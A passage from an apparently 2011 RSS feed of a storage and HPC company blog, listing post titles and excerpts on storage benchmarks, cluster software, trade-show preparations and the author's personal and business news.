      <description>On James&#39; blog Heh. I think we&amp;rsquo;ve had and seen others have this conversation before. RAID is not a backup. Backup is very important. Ok, I did burst out laughing. The low level scan of 1PB of data to find data on the &amp;ldquo;no_backup&amp;rdquo; folder &amp;hellip; Yeah. Customer has a file system. We&amp;rsquo;ve asked them &amp;ldquo;is your data important&amp;rdquo; and they&amp;rsquo;ve answered &amp;ldquo;no&amp;rdquo;. And we try to really get whether or not its important out of them, as they didn&amp;rsquo;t spend money on a backup, and there is the potential for a single failure to take down their data.</description>
    </item>
    
    <item>
      <title>Did you ever realize you were doing something wrong?</title>
      <link>https://blog.scalability.org/2011/12/did-you-ever-realize-you-were-doing-something-wrong/</link>
      <pubDate>Thu, 22 Dec 2011 04:44:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/did-you-ever-realize-you-were-doing-something-wrong/</guid>
      <description>In a number of our tools, I&amp;rsquo;ve written rudimentary command parser hacks using getopt and some creative ARGV processing. And this almost always led to something more complex and harder to develop/maintain. For something else we are looking at, I&amp;rsquo;ve been exploring &amp;ldquo;compilers&amp;rdquo;. Basically, define a grammar to do something, then do it. Keep the grammar consistent, simple, and easy to manage. Turns out that this maps far better into our target code than I would have thought.</description>
    </item>
    
    <item>
      <title>Is Java done?</title>
      <link>https://blog.scalability.org/2011/12/is-java-done/</link>
      <pubDate>Wed, 21 Dec 2011 17:56:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/is-java-done/</guid>
      <description>Latest updates from all distro vendors. Java plugins no longer work on any browsers. Updated from Oracle, or the OpenJDK stack, or &amp;hellip; Doesn&amp;rsquo;t matter. Can&amp;rsquo;t get it to work anywhere. This is a positive development &amp;hellip; right? We can call this &amp;ldquo;experiment&amp;rdquo; over? Maybe all the nice folks who&amp;rsquo;ve been coding their IPMI/iLOM tools for years as Java clients will now &amp;hellip; please &amp;hellip; switch to HTML5 so we can drop this anachronism from our machines for once and for all?</description>
    </item>
    
    <item>
      <title>partially OT: something I am going to write about soon</title>
      <link>https://blog.scalability.org/2011/12/partially-ot-something-i-am-going-to-write-about-soon/</link>
      <pubDate>Wed, 21 Dec 2011 06:32:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/partially-ot-something-i-am-going-to-write-about-soon/</guid>
      <description>Business models and business model changes. Not ours, but a general observation I&amp;rsquo;ve made. This is oddly important for me (outside of the business) as I&amp;rsquo;ve been writing some stuff I&amp;rsquo;ve been thinking of submitting for &amp;ldquo;publication&amp;rdquo;, and what &amp;ldquo;publication&amp;rdquo; means is rapidly changing. FWIW: this is science fiction stuff. I&amp;rsquo;m an avid reader of these things (much to my wife&amp;rsquo;s dismay, given the number of books I buy), and I am enjoying writing this stuff as well.</description>
    </item>
    
    <item>
      <title>Incremental update: an extra 10-15% out of JackRabbit JR4</title>
      <link>https://blog.scalability.org/2011/12/incremental-update-an-extra-10-15-out-of-jackrabbit-jr4/</link>
      <pubDate>Tue, 20 Dec 2011 16:17:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/incremental-update-an-extra-10-15-out-of-jackrabbit-jr4/</guid>
      <description>This is nice. Our JackRabbit JR4 high performance tightly coupled storage and computing unit, 54TB usable (72TB raw). Simple 64GB uncached streaming read/write.
Run status group 0 (all jobs): READ: io=65412MB, aggrb=2515.3MB/s, minb=2575.7MB/s, maxb=2575.7MB/s, mint=26006msec, maxt=26006msec Run status group 0 (all jobs): WRITE: io=65412MB, aggrb=2619.3MB/s, minb=2682.7MB/s, maxb=2682.7MB/s, mint=24974msec, maxt=24974msec  Yeah, that&amp;rsquo;s about 10-15% better performance (newer driver, updated/tuned kernel, &amp;hellip;). Nice! FWIW: some of our competitors have trouble sustaining this performance out of their storage clusters with double to quadruple the number of drives, RAIDs, etc.</description>
    </item>
    
    <item>
      <title>Finally moving to git</title>
      <link>https://blog.scalability.org/2011/12/finally-moving-to-git/</link>
      <pubDate>Sat, 17 Dec 2011 20:08:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/finally-moving-to-git/</guid>
      <description>Yeah, it&amp;rsquo;s taken a while. I started out many moons ago with tools like rcs/sccs, moved to the great new CVS when it came out. Then when Subversion (SVN) came out later on, I happily set up a private instance, and tried learning it. Wasn&amp;rsquo;t too painful. But SVN doesn&amp;rsquo;t do collaborative development very well. Actually, &amp;ldquo;not very well&amp;rdquo; is being kind to SVN. SVK was a Perl wrapper around SVN that added some of what we needed.</description>
    </item>
    
    <item>
      <title>positive signs</title>
      <link>https://blog.scalability.org/2011/12/positive-signs/</link>
      <pubDate>Thu, 15 Dec 2011 21:03:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/positive-signs/</guid>
      <description>As the year winds to a close &amp;hellip; only 16 days left, we&amp;rsquo;re still quite busy. I am taking this as a net positive. I&amp;rsquo;ve heard lots of M&amp;amp;A whispers over the last few months, some interesting things going on that I can&amp;rsquo;t talk about (not involving us). We&amp;rsquo;ve got lots of potential activity for Q1 lined up, and this is &amp;hellip; good. :) More soon. (Won&amp;rsquo;t have monster 7-part posts next week, but some I&amp;rsquo;ve been thinking about for a long time and have been wanting to write about)</description>
    </item>
    
    <item>
      <title>Dear Joe ...</title>
      <link>https://blog.scalability.org/2011/12/dear-joe/</link>
      <pubDate>Thu, 15 Dec 2011 17:58:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/dear-joe/</guid>
      <description>&amp;hellip; thanks for being a partner of ours. Unfortunately, the 10x-the-baseline-requirement amount of gear that you purchased through other channels doesn&amp;rsquo;t matter to us; you must purchase the baseline amount by year&amp;rsquo;s end (today is 15-December) through one of these very specific (and problematic) channels to remain a partner. Oh, and there are a few other things you have to do by year&amp;rsquo;s end, that we&amp;rsquo;ve notified you of only 2 days ago.</description>
    </item>
    
    <item>
      <title>As tiburon progresses ...</title>
      <link>https://blog.scalability.org/2011/12/as-tiburon-progresses/</link>
      <pubDate>Mon, 12 Dec 2011 17:15:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/as-tiburon-progresses/</guid>
      <description>We are now booting: Redhat 6.1, Centos 6.0, Ubuntu 11.04, and others (including VMs!) via tiburon. Completely painless for compute and storage nodes. This is letting us get to the next phase: Application Specific Nodes (or &amp;ldquo;appliances on demand&amp;rdquo; in more common language). Basic idea is, spend zero &amp;hellip; identically zero time on your expensive private/public cluster/cloud/grid/yadda yadda doing an installation. Seriously, you should not be paying cloud providers for this, and if you are, this is a problem.</description>
    </item>
    
    <item>
      <title>Semi OT:  New laptop is in</title>
      <link>https://blog.scalability.org/2011/12/semi-ot-new-laptop-is-in/</link>
      <pubDate>Sun, 11 Dec 2011 14:22:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/semi-ot-new-laptop-is-in/</guid>
      <description>Have Linux loaded. And Windows 7 Pro (actually upgraded from the Windows 7 Home they had). Ok &amp;hellip; I like it. It is very fast. About as heavy (maybe a little more so) as the Dell. Keyboard is chiclet style. I&amp;rsquo;m ok with this; Dell had a more standard type of keyboard. I can touch type on this without problem. If anything, I like it a little better. Graphics are awesome.</description>
    </item>
    
    <item>
      <title>Big memory machines  ... part 2:  This time with working riser cards</title>
      <link>https://blog.scalability.org/2011/12/big-memory-machines-part-2-this-time-with-working-riser-cards/</link>
      <pubDate>Thu, 08 Dec 2011 19:57:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/big-memory-machines-part-2-this-time-with-working-riser-cards/</guid>
      <description>Yeah baby!
 top - 14:55:24 up 2:38, 1 user, load average: 0.13, 0.17, 0.17 Tasks: 697 total, 1 running, 696 sleeping, 0 stopped, 0 zombie Cpu(s): 0.1%us, 0.1%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 1009.840G total, 18.159G used, 991.680G free, 0.000k buffers Swap: 0.000k total, 0.000k used, 0.000k free, 148.590M cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ P COMMAND 4455 root 20 0 15532 1720 944 R 1.</description>
    </item>
    
    <item>
      <title>Update on the lawyer-bomb across our bow</title>
      <link>https://blog.scalability.org/2011/12/update-on-the-lawyer-bomb-across-our-bow/</link>
      <pubDate>Thu, 08 Dec 2011 07:56:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/update-on-the-lawyer-bomb-across-our-bow/</guid>
      <description>Yeah, with all what we have going on, the last thing we need is a clueless company firing a lawyer-bomb across our bow. Remember that life isn&amp;rsquo;t fair, no time is ever a good time, and sh!t happens. It seems that the whole purpose of their &amp;hellip; er &amp;hellip; communication &amp;hellip; was to try to get us to buy the property rather than taking us to court for rent that is not due them.</description>
    </item>
    
    <item>
      <title>OT: options are known, surgery date is set</title>
      <link>https://blog.scalability.org/2011/12/ot-options-are-known-surgery-date-is-set/</link>
      <pubDate>Thu, 08 Dec 2011 07:29:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ot-options-are-known-surgery-date-is-set/</guid>
      <description>In any cancer, it appears the most important thing is to control its growth, arrange for removal, and expedite this process. You don&amp;rsquo;t want the buggers hanging around for longer than needed. We got our surgery date this past Monday. 1 day after my daughter&amp;rsquo;s 12th birthday, my wife will undergo the operation. It&amp;rsquo;s the recovery process we are preparing for, though the sheer velocity of this stuff is hitting hard.</description>
    </item>
    
    <item>
      <title>Ok, I gave in and did it</title>
      <link>https://blog.scalability.org/2011/12/ok-i-gave-in-and-did-it/</link>
      <pubDate>Wed, 07 Dec 2011 02:59:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ok-i-gave-in-and-did-it/</guid>
      <description>My trusty Dell laptop is about to be retired. Been a year and a half overdue. Doug was working hard trying to sell me the benefits of Mac Air (he has the company&amp;rsquo;s only unit). He also has the Mac mini on his desk. I need a serious graphics card in the laptop. An NVidia card (for the occasional CUDA programming bit, and some things I work on in the background) is preferred.</description>
    </item>
    
    <item>
      <title>[UPDATED with more info]  regression in Gluster</title>
      <link>https://blog.scalability.org/2011/12/annoying-regression-in-gluster/</link>
      <pubDate>Sun, 04 Dec 2011 20:07:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/annoying-regression-in-gluster/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Moving web code base from Catalyst to Mojolicious</title>
      <link>https://blog.scalability.org/2011/12/moving-web-code-base-from-catalyst-to-mojolicious/</link>
      <pubDate>Sun, 04 Dec 2011 03:31:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/moving-web-code-base-from-catalyst-to-mojolicious/</guid>
      <description>It&amp;rsquo;s a long story. For those who don&amp;rsquo;t know, Catalyst is a Perl based web framework. So is Mojolicious. The person who started developing Catalyst years ago left that group, and later started Mojolicious. I like many things about Catalyst. Like other MVC frameworks, it lets you divide your logic among controllers (the heavy lifters), the model (aka the database), and the display logic. Prior to this, I wrote some rather ugly looking code which combined controllers and display logic.</description>
    </item>
    
    <item>
      <title>Monitoring tools</title>
      <link>https://blog.scalability.org/2011/12/monitoring-tools/</link>
      <pubDate>Sun, 04 Dec 2011 02:41:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/monitoring-tools/</guid>
      <description>We have a collection of tools that we use for various monitoring. Some are the classical standards (iostat, vmstat, &amp;hellip;), the somewhat more heavyweight (collectl, dstat), the simple (not in a bad way) graphical tools (munin, ganglia, &amp;hellip;). We&amp;rsquo;ve found tools like Zabbix do a good job of killing some machines, as there are often memory leaks in these tools. What we&amp;rsquo;ve not found, anywhere, is a good set of simple measurement tools that provide data in a form that allows easy inclusion into something akin to a dashboard.</description>
    </item>
    
    <item>
      <title>big memory machines</title>
      <link>https://blog.scalability.org/2011/12/big-memory-machines/</link>
      <pubDate>Fri, 02 Dec 2011 19:23:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/big-memory-machines/</guid>
      <description>Haven&amp;rsquo;t finished debugging this unit yet. Thought you might like to see top info. These are physical CPUs BTW, not SMT.
top - 09:21:29 up 3 min, 2 users, load average: 0.22, 0.21, 0.09 Tasks: 219 total, 1 running, 218 sleeping, 0 stopped, 0 zombie Cpu0 : 0.7%us, 0.3%sy, 0.0%ni, 99.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu1 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu2 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.</description>
    </item>
    
    <item>
      <title>Ahhh ... drama ... just what I need right now</title>
      <link>https://blog.scalability.org/2011/12/ahhh-drama-just-what-i-need-right-now/</link>
      <pubDate>Thu, 01 Dec 2011 18:49:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ahhh-drama-just-what-i-need-right-now/</guid>
      <description>Way back some time ago, our landlord, whom we were somewhat concerned about due to their financial state (lots of vacant spots here in our complex), had their mortgage called by the bank that took over from the bank they&amp;rsquo;d had before, when it went belly up. That new bank called their loan. They didn&amp;rsquo;t notify us of this until we got the note from the lawyer demanding we pay them rent rather than the landlord.</description>
    </item>
    
    <item>
      <title>OT:  it really focuses your attention on the important things</title>
      <link>https://blog.scalability.org/2011/11/ot-it-really-focuses-your-attention-on-the-important-things/</link>
      <pubDate>Tue, 29 Nov 2011 06:30:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/ot-it-really-focuses-your-attention-on-the-important-things/</guid>
      <description>[Update below the fold] My wife has this tongue-in-cheek &amp;ldquo;theory&amp;rdquo; on balance in the universe. Comes from being a physics geek I guess (yeah, we are a pair). Maybe I&amp;rsquo;ll tell the &amp;ldquo;spherical horse&amp;rdquo; joke some day again, in public. Our opening of 2011 was, well, crappy. And that&amp;rsquo;s an understatement. We lost her father Frank to cancer. He had fought off one form, and 2 years later, it reared its ugly head.</description>
    </item>
    
    <item>
      <title>I just can&#39;t say enough good things about HP&#39;s procurve networking gear</title>
      <link>https://blog.scalability.org/2011/11/i-just-cant-say-enough-good-things-about-hps-procurve-networking-gear/</link>
      <pubDate>Mon, 28 Nov 2011 20:27:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/i-just-cant-say-enough-good-things-about-hps-procurve-networking-gear/</guid>
      <description>Basically, their support rocks! Their switches are pretty good to begin with. But (apart from very long phone waits &amp;hellip; 50+ minutes in this case), their support team is exactly what I want to deal with. No nonsense, speaking to someone who knows what&amp;rsquo;s going on with the units. Kudos again to #HP !</description>
    </item>
    
    <item>
      <title>Some of the more mainstream publications are now at least acknowledging the prospect of an epic failure</title>
      <link>https://blog.scalability.org/2011/11/some-of-the-more-mainstream-publications-are-now-at-least-acknowledging-the-prospect-of-an-epic-failure/</link>
      <pubDate>Fri, 25 Nov 2011 17:26:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/some-of-the-more-mainstream-publications-are-now-at-least-acknowledging-the-prospect-of-an-epic-failure/</guid>
      <description>&amp;hellip; in climategate &amp;hellip; The Register&amp;rsquo;s piece isn&amp;rsquo;t bad. Actually quite good. Their thesis is &amp;ldquo;this sort of stuff happens when you get big money/politics following dubious claims; a cottage industry and group think evolve&amp;rdquo;. They note similar examples from other industries. I am not saying I completely agree with their characterization; it sounds reasonable, but it is comparing somewhat unlike things with a similar metric. The issue is that public policy (and money, influence, power, &amp;hellip;) flows from the political class and could pollute the underpinnings of the scientific class.</description>
    </item>
    
    <item>
      <title>Senses of urgency</title>
      <link>https://blog.scalability.org/2011/11/senses-of-urgency/</link>
      <pubDate>Wed, 23 Nov 2011 17:42:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/senses-of-urgency/</guid>
      <description>We do lots of business with customers who want things yesterday. We do what we can to accommodate, but we do build things in a just-in-time model. Avoids costly inventory, and keeps us nimble. This also means we have to micromanage our suppliers. Many don&amp;rsquo;t quite understand what a &amp;ldquo;sense of urgency&amp;rdquo; means. When we tell them we want something by a specific date, and they ship it a month later &amp;hellip; Or a case we are dealing with now, where we&amp;rsquo;ve had a long/huge wait from a supplier, who then shipped us something non-working.</description>
    </item>
    
    <item>
      <title>Announcing dust v1.0</title>
      <link>https://blog.scalability.org/2011/11/announcing-dust-v1-0/</link>
      <pubDate>Tue, 22 Nov 2011 19:17:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/announcing-dust-v1-0/</guid>
      <description>Dust has finally &amp;hellip;. FINALLY &amp;hellip;. been released. We&amp;rsquo;ve had the driver update packs out there for a while, but finally we&amp;rsquo;ve released DUST. What is DUST you might say? How about a way to automatically update drivers from source/distributions? But wait &amp;hellip; isn&amp;rsquo;t that just dkms? Sort of. We&amp;rsquo;ve found &amp;hellip; horrific problems &amp;hellip; with DKMS that we couldn&amp;rsquo;t solve. We wound up writing scripts to work around DKMS as it didn&amp;rsquo;t build things the way we needed them built.</description>
    </item>
    
    <item>
      <title>Uptick in requests for software only solution</title>
      <link>https://blog.scalability.org/2011/11/uptick-in-requests-for-software-only-solution/</link>
      <pubDate>Mon, 21 Nov 2011 03:07:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/uptick-in-requests-for-software-only-solution/</guid>
      <description>Some locations are farther than others, and this makes shipping gear pretty expensive. We&amp;rsquo;ve been asked for a software only version of our stack from the 2 remaining continents we don&amp;rsquo;t have installs on (ok, 2 of 3 &amp;hellip; not too much business in Antarctica right now). I won&amp;rsquo;t get into the positives/negatives of this business model. Shipping bits lowers costs as compared to shipping atoms. But atoms are tangible, and require a cost to reproduce patterns that bits don&amp;rsquo;t impose.</description>
    </item>
    
    <item>
      <title>#SC11 benchmarketing gone horribly awry</title>
      <link>https://blog.scalability.org/2011/11/sc11-benchmarketing-gone-horribly-awry/</link>
      <pubDate>Sat, 19 Nov 2011 20:30:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-benchmarketing-gone-horribly-awry/</guid>
      <description>OMFG &amp;hellip; we were (and are) continuously inundated with benchmarketing numbers. These numbers purport to represent the system in question. They don&amp;rsquo;t. We can derive their numbers by multiplying the number of drives by the theoretical best case performance, assuming everything else is perfect. Never mind that it never is perfect. It&amp;rsquo;s that the benchmarketing numbers haven&amp;rsquo;t been measured, in a real context. We do the measurements in a real context and report the results to end users.</description>
    </item>
    
    <item>
      <title>#SC11 interviews, observations, and thoughts</title>
      <link>https://blog.scalability.org/2011/11/sc11-interviews-observations-and-thoughts/</link>
      <pubDate>Sat, 19 Nov 2011 20:00:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-interviews-observations-and-thoughts/</guid>
      <description>Yeah, this show had lots of folks talking storage. Obviously we did too. Nicole from Datanami (she had a terrible cold running at the time, I hope she is feeling better) asked me to give a short set of non-advertising type interviews. Below is what I did, given no prep, no forewarning, and about 30 seconds to mentally prepare (and that might be generous). Part 1: Big Data in Media and Entertainment</description>
    </item>
    
    <item>
      <title>#SC11 wrap up, part 1 (short)</title>
      <link>https://blog.scalability.org/2011/11/sc11-wrap-up-part-1-short/</link>
      <pubDate>Sat, 19 Nov 2011 19:20:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-wrap-up-part-1-short/</guid>
      <description>Back in Michigan. Long flight, quite tired, but back. This was a good show for us. A very good show. Gave away lots of siMugs, released siFlash, did demos and had discussions. Generally speaking, we had good booth traffic, and many readers of this blog came by to say hello. Thank you for that! I very much enjoyed this, and meeting people in person for the first time. Sponsoring Beobash was fun.</description>
    </item>
    
    <item>
      <title>#SC11 T-1 and counting ... Beobash, booth and stuff...</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-1-and-counting-beobash-booth-and-stuff/</link>
      <pubDate>Tue, 15 Nov 2011 08:00:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-1-and-counting-beobash-booth-and-stuff/</guid>
      <description>Tonight was/is Beobash. First time I stopped drinking the beer, and started buying the beer. Was very nice, but we were (collectively and individually) exhausted. Snapped a few pics. Will try to have them up tomorrow. Very nice venue. Very good crowd. Booth (#SC11 booth 4101) is up. Amazingly, everything seems to be working. Even missed shipping a few things (yes, yes we did), and for the most part, was able to fix that.</description>
    </item>
    
    <item>
      <title>#SC11 T minus 2 days :  on the plane ... yeah ... on the plane</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-minus-2-days-on-the-plane-yeah-on-the-plane/</link>
      <pubDate>Sun, 13 Nov 2011 21:21:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-minus-2-days-on-the-plane-yeah-on-the-plane/</guid>
      <description>Somewhere over Montana, around Helena. Bumpy weather up ahead. Finished PR v1 for siFlash, Doug is editing. Will get this out tomorrow at a few venues (we&amp;rsquo;ve promised one specific one will be first). Working on the presentations for the booth. siFlash intro, the whole arc with big data, siCluster and our JackRabbit and DeltaV point storage units, and Tiburon. And the use cases presentation. Didn&amp;rsquo;t have time to get company name usage permission (e.</description>
    </item>
    
    <item>
      <title>#SC11 T minus 3 days: the $dayjob mailing</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-the-dayjob-mailing/</link>
      <pubDate>Sat, 12 Nov 2011 22:03:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-the-dayjob-mailing/</guid>
      <description>Finally got this out the door. There were some issues in doing so &amp;hellip; our CRM tool seemed to get brain-freeze. Test emails worked fine. But the real ones? Nah &amp;hellip; fuggedaboutit. So here it is, in all its glory. We try our best (really) not to spam. I don&amp;rsquo;t like it and I know our customers don&amp;rsquo;t like it.
Storage Solutions
As a high performance big data storage specialist, Scalable Informatics is well positioned to provide your company with fast, effective, dependable, and cost-effective storage solutions.</description>
    </item>
    
    <item>
      <title>#SC11 T minus 3 days and counting</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-and-counting/</link>
      <pubDate>Sat, 12 Nov 2011 21:54:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-and-counting/</guid>
      <description>Ok. Let&amp;rsquo;s call this an absolutely wild ride so far. I mean, it&amp;rsquo;s freaking insane. I cannot remember working so hard and so fast. First off, Tiburon, our cluster software package (designed mostly for HPC Storage, and cluster like things) has been an insanely awesome trouper. It just works. And I mean that in a jaw dropping manner. It just freaking works. Part of it may be due to the simplicity of the thing.</description>
    </item>
    
    <item>
      <title>The joys of new tools ... and discovering broken/missing functionality within them</title>
      <link>https://blog.scalability.org/2011/11/the-joys-of-new-tools-and-discovering-brokenmissing-functionality-within-them/</link>
      <pubDate>Sat, 05 Nov 2011 16:07:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/the-joys-of-new-tools-and-discovering-brokenmissing-functionality-within-them/</guid>
      <description>The object of my attention this morning is dracut, the replacement for the venerable mkinitrd in the RHEL/Fedora lines. Dracut has great promise, in that it is being built as a construction kit for initial ramdisks for booting Linux. Unfortunately, like mkinitrd, it has a number of &amp;hellip; er &amp;hellip; failures. Happily it has a concept of a shell you can drop into if things go pear shaped. mkinitrd generates initrd&amp;rsquo;s that will often simply kernel panic with no way to debug.</description>
    </item>
    
    <item>
      <title>Using Makefiles for analysis pipelines</title>
      <link>https://blog.scalability.org/2011/11/using-makefiles-for-analysis-pipelines/</link>
      <pubDate>Fri, 04 Nov 2011 21:29:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/using-makefiles-for-analysis-pipelines/</guid>
      <description>Got a mess-of-data. Whole load of it. Need to analyze it. Again and again and again. Don&amp;rsquo;t want to cut n paste. Or write too much code. Need to automate plot generation. This reminded me of my thesis many (cough cough) years ago. I used a Makefile to automate driving TeX. And image formatting, and final document assembly. Yes, to write my thesis, I typed &amp;ldquo;make&amp;rdquo;. Sure enough, same type of process, different decade (cough millennium).</description>
    </item>
    
    <item>
      <title>Almost forgot ... an instant on cluster</title>
      <link>https://blog.scalability.org/2011/11/almost-forgot-an-instant-on-cluster/</link>
      <pubDate>Fri, 04 Nov 2011 21:22:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/almost-forgot-an-instant-on-cluster/</guid>
      <description>We setup a nice Ubuntu cluster for a customer in the financial services world recently. They wanted something that was similar enough to what they knew, and was as close to painless for them to use as possible. Make it like a Ubuntu system. And make it easy to manage. Real easy. The issue was and is, pretty much none of the major cluster distros really support Ubuntu. A few have some hacks to enable some level of support.</description>
    </item>
    
    <item>
      <title>in SC mode ... and trying to ship orders before we fly out ... and working on support ... and ...</title>
      <link>https://blog.scalability.org/2011/11/in-sc-mode-and-trying-to-ship-orders-before-we-fly-out-and-working-on-support-and/</link>
      <pubDate>Fri, 04 Nov 2011 13:53:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/in-sc-mode-and-trying-to-ship-orders-before-we-fly-out-and-working-on-support-and/</guid>
      <description>I&amp;rsquo;m gonna need another vacation soon. This is nuts. Got a bunch of machines going out to the UK next week, a set of SSDs off to Sweden, machines to Texas, and California. New orders from the east coast (a number of repeat customers). Oh &amp;hellip; and trying to get our demo systems built, and ready, and the demos up. And get the presentations together. And the PR done. And the investment thingy (gotta nudge the lawyer again, really wanted to announce this by SC11).</description>
    </item>
    
    <item>
      <title>And now readers, its time for deep thoughts ...</title>
      <link>https://blog.scalability.org/2011/10/and-now-readers-its-time-for-deep-thoughts/</link>
      <pubDate>Mon, 31 Oct 2011 20:11:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/and-now-readers-its-time-for-deep-thoughts/</guid>
      <description>[the guru sits down and starts typing with nonchalance] Complex software stacks lead to complex and often opaque failure modes. [slight bow, stands up, leaves room] Infiniband &amp;hellip;. WHY WHY WHY WHY WHY &amp;hellip; (grumble)</description>
    </item>
    
    <item>
      <title>... and Sandforce is gobbled up by LSI ...</title>
      <link>https://blog.scalability.org/2011/10/and-sandforce-is-gobbled-up-by-lsi/</link>
      <pubDate>Fri, 28 Oct 2011 18:30:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/and-sandforce-is-gobbled-up-by-lsi/</guid>
      <description>From The Register &amp;hellip; This is interesting, as LSI appears to be girding for the next gen in storage. Flash (the PCIe variant) and SSD (the disk channel variant) are on the rise, and things that add value in that chain will be quite interesting acquisitions. We work closely with Virident, and it wouldn&amp;rsquo;t surprise me if they, or Texas Memory Systems were acquired by a larger entity. This isn&amp;rsquo;t consolidation in the classical sense, this is girding for future battle.</description>
    </item>
    
    <item>
      <title>#SC11 countdown and some administrivia</title>
      <link>https://blog.scalability.org/2011/10/sc11-countdown-and-some-administrivia/</link>
      <pubDate>Fri, 28 Oct 2011 04:56:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/sc11-countdown-and-some-administrivia/</guid>
      <description>So we are on the long march to #SC11 (we are booth 4101, please do stop by!). Figuring out the final bits of the booth content. Working on presentations. Hoping we will have enough disks for the demos I am working on putting together. Then the fun stuff. The mugs: Doug and I had fun with these. Aren&amp;rsquo;t giving them out to everyone &amp;hellip; you have to really cozy up to us for one &amp;hellip; and we will have a Keurig coffee/tea maker there so we can fill em.</description>
    </item>
    
    <item>
      <title>Is this another &#34;Perl indistinguishable from line noise&#34; argument?  Don&#39;t know ...</title>
      <link>https://blog.scalability.org/2011/10/is-this-another-perl-indistinguishable-from-line-noise-argument-dont-know/</link>
      <pubDate>Fri, 28 Oct 2011 03:04:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/is-this-another-perl-indistinguishable-from-line-noise-argument-dont-know/</guid>
      <description>&amp;hellip; but I do know that the analysis has some &amp;hellip; er &amp;hellip; flaws. Yeah. Flaws. I&amp;rsquo;ll ignore their sample size issue for the moment (though it does go to the size of their error bars &amp;hellip; I hope they appreciate the inverse functional relationship between these two). Take two sets of data with error bars. Put them down on the same graph. The data from each set overlaps within the error bars of the other set.</description>
    </item>
    
    <item>
      <title>A new spin on &#39;hard cases make for bad laws&#39; ... but with benchmark codes</title>
      <link>https://blog.scalability.org/2011/10/a-new-spin-on-hard-cases-make-for-bad-laws-but-with-benchmark-codes/</link>
      <pubDate>Thu, 27 Oct 2011 21:12:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/a-new-spin-on-hard-cases-make-for-bad-laws-but-with-benchmark-codes/</guid>
      <description>We run (as you might imagine) lots of benchmarks. We do lots of system tuning. We start with null hypotheses and work from there. Sometimes you can call that the baseline expected measurements. Your call on what you want to call it. But a measurement implicitly implies a comparison to a known quantity. In the case of the baseline or null hypothesis, you measure what you should believe to be a reasonable configuration, the way it would be used.</description>
    </item>
    
    <item>
      <title>Iris ... are you our new overlord?</title>
      <link>https://blog.scalability.org/2011/10/iris-are-you-our-new-overlord/</link>
      <pubDate>Wed, 26 Oct 2011 19:43:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/iris-are-you-our-new-overlord/</guid>
      <description>So I started playing with Iris on my android phone. Not because of Siri envy, but because I heard it was &amp;hellip; er &amp;hellip; interesting. I started out with the usual &amp;hellip; Me: &amp;ldquo;What is the airspeed of an unladen swallow&amp;rdquo; Iris: 28 miles per hour Ok, that was interesting. Then I asked a few other fact based questions, should be easy to answer. Finally, I wanted to see if there was some humor in what it might say (not that Iris has a personality that wishes to express humor, but possibly on the part of its programmers, or in the search results).</description>
    </item>
    
    <item>
      <title>OT:  Minor drama of renting an office</title>
      <link>https://blog.scalability.org/2011/10/ot-minor-drama-of-renting-an-office/</link>
      <pubDate>Wed, 26 Oct 2011 15:04:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/ot-minor-drama-of-renting-an-office/</guid>
